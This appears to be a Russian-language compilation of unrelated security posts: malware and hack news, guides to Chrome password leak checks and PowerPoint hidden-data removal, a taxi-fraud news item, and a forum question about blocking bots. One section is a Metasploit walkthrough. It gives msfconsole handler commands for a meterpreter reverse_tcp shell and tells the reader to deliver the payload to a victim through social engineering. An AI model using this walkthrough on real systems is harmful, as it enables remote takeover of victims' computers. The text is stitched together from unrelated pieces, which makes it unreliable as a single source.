Исследователи в области безопасности обнаружили, что злоумышленники используют всплывающие предупреждения Foxit PDF Reader для доставки вредоносного ПО пользователям посредством зараженных PDF-файлов.
Хакеры применяют специальное программное обеспечение для создания PDF-документов с макросами, которые выполняют вредоносные команды, загружающие и запускающие вредоносное ПО. Опасность заключается в том, что некоторые всплывающие предупреждения в Foxit PDF Reader делают вредоносную опцию выбором по умолчанию, что облегчает задачу для хакеров. Это особенно актуально, учитывая, что Foxit PDF Reader имеет более 700 миллионов пользователей по всему миру.
Эксперты в области безопасности настоятельно рекомендуют использовать технические средства защиты информации для предотвращения подобных атак. Продукты, предназначенные для разграничения доступа и обнаружения аномалий в работе приложений, могут эффективно блокировать всплывающие окна и обнаруживать вредоносную активность. В частности, продукт Ankey ASAP на основе машинного обучения способен распознавать поддельные всплывающие окна и своевременно предупреждать об угрозах, позволяя администраторам принимать необходимые меры по защите.
Время сейчас неспокойное, то приложение поддельное в Google Play обнаружат, то троян на телефоне проявит себя, то пароль от аккаунта украдут.
О последнем в этом посте и пойдёт речь.
Никто не застрахован от того, что его аккаунт на каком-то сервисе взломают или украдут.
Всё, что мы, как пользователи, можем сделать - придумать сложный пароль для нового аккаунта.
Сегодня редко взламывают аккаунты через простой перебор вариантов. Это требует больших вычислительных мощностей, и не оправдывает вложенные средства.
Но базы данных собираются, в надежде, что в ближайшем будущем вычислительные мощности сильно вырастут, а стоимость единицы времени работы системы упадёт, и взлом методом подбора станет экономически выгодным.
Кажется, что вы защищены.
Но ведь вы не знаете насколько надёжно хранятся данные у сервиса которым вы пользуетесь. В самом запущенном случае они могут лежать в обычном текстовом файле или в базе данных в не зашифрованном виде.
Сегодня это редкость, но иногда ещё встречается.
Хакеры не дремлют и постоянно находят новые методы утянуть данные пользователей из баз данных сервисов, чтобы работать с ними с присущим им коварством и изощрёнными мыслями.
Я предлагаю простой способ, который позволит узнать, что данные вашего аккаунты были "слиты" в сеть хакерами и теперь они находятся в свободном доступе.
Да, чаще всего они в зашифрованном виде, но кто знает, возможно, прямо сейчас работает огромный сервер, подбирая пароли в только что купленной ранее украденной базе данных.
Зачем рисковать и ждать получится у них подобрать пароль или нет? Лучше заранее сменить пароль, если он бы скомпрометирован и спать спокойно.
Компания Google позаботилась о нас и встроила в браузер Chrome инструмент, который проверит все сохранённые в вашем Google аккаунте пароли и уведомит вас о том, попадались ли они в украденных базах данных или нет.
У меня возникает вопрос о том, откуда Google получает эту информацию, но это уже предмет для отдельного исследования.
Видеоинструкция по проверки паролей на утечку через Google Chrome
Для тех, кому не хочется смотреть видео, пишу ниже текстовую инструкцию:
Запустите браузер Chrome на телефоне
Нажмите на иконку "три точки" в верхнем правом углу, в контекстном меню нажмите на "настройки"
Далее выберите "Менеджер паролей"
Внизу появится панель, на которой нажмите на "Проверка"
Дождитесь окончания проверки и следуйте рекомендациям на экране
Как видите, данные моих учётных записей никто не украл. Это приятно. Однако, видно, что в старых аккаунтах я использовал один и тот же пароль, причём, простой. Это надо исправить.
Как работает механизм проверки?
Google Chrome использует встроенный инструмент Google Password Checkup для проверки сохраненных паролей на утечку, не раскрывая их содержимое. Вот как это работает:
Пароли пользователя безопасно хранятся в Google Account, зашифрованные и недоступные для просмотра
Google Password Checkup периодически сравнивает хэши (криптографические отпечатки) сохраненных паролей с базами скомпрометированных паролей, не раскрывая сами пароли
Если пароль был замечен в утечках данных, Google Password Checkup предупреждает пользователя и рекомендует его сменить, не раскрывая его содержимое
Таким образом, Google Chrome может проверять пароли на компрометацию, используя только их хэши, без необходимости знать сами пароли в открытом виде
Это позволяет обеспечить безопасность сохраненных паролей, предупреждая пользователей об утечках, не раскрывая при этом конфиденциальные данные. Ключевым моментом является использование криптографических хэшей вместо открытых паролей.
Если по необычайному стечению обстоятельств вам стало любопытно, есть ли ещё подобные лайфхаки для смартфонов Xiaomi - добро пожаловать на MetaMi.
Вечером 9 мая сайт аукционного дома Christie's подвергся хакерской атаке, последствия которой не ликвидированы до сих пор.
При этом данное обстоятельство не помешало компании провести все запланированные торги в оффлайн-формате.
Так, 10 мая состоялся 10-й благотворительный аукцион Only Watch, в ходе которого было выручено CHF 28,320,000.
А 14 мая прошли торги Rare Watches, на которых на продажу были выставлены модели из личной коллекции Михаэля Шумахера.
На данный момент Christie's отменил онлайн-аукционы. Подробности хакерской атаки также держатся в тайне. Если выяснится, что произошла утечка персональных данных клиентов, аукционному дому грозят большие проблемы.
Metasploit Framework - это мощный инструмент, который может быть использован как злоумышленниками, так и этичными хакерами и специалистами по тестированию на проникновение для исследования уязвимостей в сетях и на серверах.
Проект Metasploit был создан на языке Perl в 2003 году Эйч Ди Муром (H.D. Moore) при содействии основного разработчика Мэтта Миллера для использования в качестве портативного сетевого инструмента. Он был полностью переведен на язык Ruby к 2007 году, а в 2009 году лицензию приобрела Rapid7, и теперь этот инструмент остается частью ассортимента этой компании, специализирующейся на разработке систем обнаружения вторжений и инструментов эксплуатации уязвимостей систем удаленного доступа.
Этот фреймворк стал основным инструментом разработки эксплойтов. До Metasploit пентестерам приходилось выполнять все проверки вручную, используя различные инструменты, которые могли поддерживать или не поддерживать тестируемую платформу, а также вручную писать собственный код для эксплуатации уязвимостей.
Основными компонентами инструмента являются эксплойты и пэйлоады.
Эксплойт - это код, который эксплуатирует ошибку, неверную настройку или системный сбой — любую брешь в защите. Эксплойт помогает найти ее, а потом воспользоваться, чтобы получить контроль над целевой системой. Создавать эксплойты лучше самостоятельно, но с Metasploit это быстрее и проще. Во фреймворке есть образцы готового кода.
Пэйлоады. Когда эксплойт получает доступ к системе, выполняется определенный код. Его называют пэйлоадом, или полезной нагрузкой. Обычно это шелл-код — команды, написанные на языке оболочки операционной системы, то есть для консоли ОС. Пэйлоад нужен, чтобы установить соединение, запустить вредоносный код или выполнить другую операцию.
Дополнительные модули Metasploit позволяют просканировать сеть и проанализировать трафик, который через нее идет. Это необходимо на начальном этапе атаки — так пентестер получает информацию, нужную для проникновения.
В состав фреймворка входят:
библиотеки — в первую очередь библиотека Rex для основных операций. На ней базируются другие — MSF Core и MSF Base. Вместе они составляют основное ядро команд Metasploit;
модули — эксплойты, пэйлоады и прочие, о которых рассказывали выше;
инструменты — дополнительное ПО для работы;
вспомогательные плагины;
интерфейсы — то, с помощью чего пользователь взаимодействует с Metasploit. По умолчанию это доступ через консоль или CLI — консольное приложение. Можно установить или настроить графический интерфейс.
MSFVenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, двоюродный брат Metasploit. С его помощью вы можете создавать различные полезные нагрузки, шелл-код и обратный шелл.
Reverse TCP (обратное подключение, обратный шелл, пэйлоад) — схема взаимодействия с целевым компьютером. Мы создаем вредоносный файл (полезную нагрузку), после запуска которого целевой компьютер будет пытаться подключиться к нашему компьютеру. Это называется «бэкконнект» или обратный шелл.
Чтобы узнать, какие полезные нагрузки доступны введите команду:
msfvenom -l payloads
Следующая команда создаст вредоносный исполняемый файл (обратный шелл), после запуска которого откроется сеанс Meterpreter.
LHOST — IP-адрес вашего компьютера (атакующего).
LPORT — порт вашего компьютера, который назначен серверу или программе.
P — сокращение от «payload», полезная нагрузка для выбранной платформы.
F — параметр, который задает тип файла, например, exe для Windows.
Мы создали пэйлоад, теперь переходим к следующему этапу. Запускаем msfconsole и вводим команды:
msf> use exploit/multi/handler msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp msf> set LHOST 192.168.1.13 msf> set LPORT 4444 msf> run
Этой операцией мы позволяем принять подключение от созданного нами ранее обратного шелла, который запустит жертва.
После создания вредоносного файла необходимо отправить его жертве. Вы можете использовать методы социальной инженерии или любой другой способ доставки вредоносного файла.
После запуска созданного файла откроется сессия Meterpreter:
Поздравляю, вы получили доступ к компьютеру.
Информация предоставлена для информационных целей.
Важно обеспечить безопасность вашей информации, особенно когда дело касается презентаций и документов в Microsoft Office. Часто мы забываем о скрытых свойствах и данных, которые могут быть вложены в файлы.
Чтобы проверить документ PowerPoint на скрытые данные:
1. Перейдите во вкладку «Файл».
2. В разделе «Сведения» тапните «Проверка презентации» → «Инспектор документов».
3. Отметьте галочками пункты для проверки и нажмите «Проверить».
4. В отчете вы увидите найденные скрытые свойства и персональные данные.
5. Нажмите «Удалить все», чтобы удалить из презентации всю персональную информацию.
Неизвестные лица обнаружили простейшую уязвимость в сервисе такси, которая не давала перевести с карты на наличку при отсутствии баланса на карте указанной в поездке и реализовала схему, позволившую им совершить поездки в долг на сумму более 4,6 миллиона рублей по информации от компании "Яндекс". Как сообщила Ирина Волк, найденная киберпреступниками уязвимость позволяла незаконно получать деньги, которые в качестве оплаты переводили пассажиры такси, но как поясняют неофициальные источники деньги никто не воровал, а люди добровольно отправляли деньги за поездки такси в половину меньше чем стоил заказ в приложении, а водителю через 3 дня приходила компенсация за совершенные заказы от компании "Яндекс".
«В одной из социальных сетей фигуранты создали аккаунт, в котором предлагали перевозки с 50-процентной скидкой. Благодаря мошеннической схеме платежи пользователей поступали на счет одного из аферистов. За несколько месяцев незаконной деятельности ущерб превысил 4,6 миллиона рублей», — написала Волк.
С момента совершенных заказов прошло более 2 лет и только сейчас компания Яндекс провела проверку и выявила данные долговые поездки.
При аресте у них были найдены и изъяты компьютеры, ноутбуки, мобильные телефоны, сим-карты, банковские карты, а также 1,5 миллиона рублей.
Уголовное дело возбудили по части 4 статьи 159 УК РФ, обвиняемым грозит по данной статье до 10 лет лишения свободы. Однако решения суда они будут дожидаться под домашним арестом.
Похоже у Яндекса тяжелые времена настали, раз он начал выбивать деньги с должников за заказы спустя несколько лет.
Ребята молодые и умные и на зоне им делать точно нечего. Остается только надеется что Яндекс найдет иной способ решения проблемы с ребята кроме как отправлять их кушать баланду
Добрый день! Нужен совет программиста. У знакомого есть местячковый сайт, указывать название не буду, чтобы за рекламу не приняли. Содержание сайта – всякие интервью с директорами компаний и полезные статейки для бизнеса. Сайту уже 23 года, сам сайт на Вордпрессе уже 4 год (раньше был самописный).
Человек хостится на Рег.ру с тарифом Host-3. Недавно (после предупреждения) хостер выключил сайт потому что нагрузка на CPU за 7 дней составила 23% при допустимой в 13%.
Хозяин сайта в силу возраста попросил меня по знакомству посмотреть и поправить по возможности ситуацию. Я ни айтишник ни разу, но почитав помощь хостинга, разблокировал, увидел, что с конкретных ip адресов и ботов идет куча запросов.
Заблокировал эти адреса через плагин Wordfence в админке, Заблокировал адреса также в htaccess. Там же, в htaccess заблокировал бота ClaudeBot с 42000 запросов, а так же 5 000 ежедневных запросов от бота facebook.
Техподдержка ответила хозяину сайта тоже самое, что я уже сделал и прислала правило в файл .htaccess, предложив еще добавить фильтрацию траффика с их стороны (не знаю за сколько денег).
Сегодня зашел в админку и вижу что все эти блокировки моих "знакомых" IP адресов вообще пофигу. Как пытались зайти, так и пытаются.
Вопросы: 1)Можно ли сделать так, чтобы эти адреса действительно заблокировать и как это сделать? 2)Правильно ли я вписал директиву в htaccess? 3)Не получится ли, что вместо этих IP адресов прийдут на смену другие?
P.S. Убрал на всякий случай часть цифр, во избежании всякого разного. Еще раз хочу сказать, что я не программист и если у кого есть желание ответить, просьба максимально простым языком написать. Шутки люблю, но хотелось бы решить ситуацию.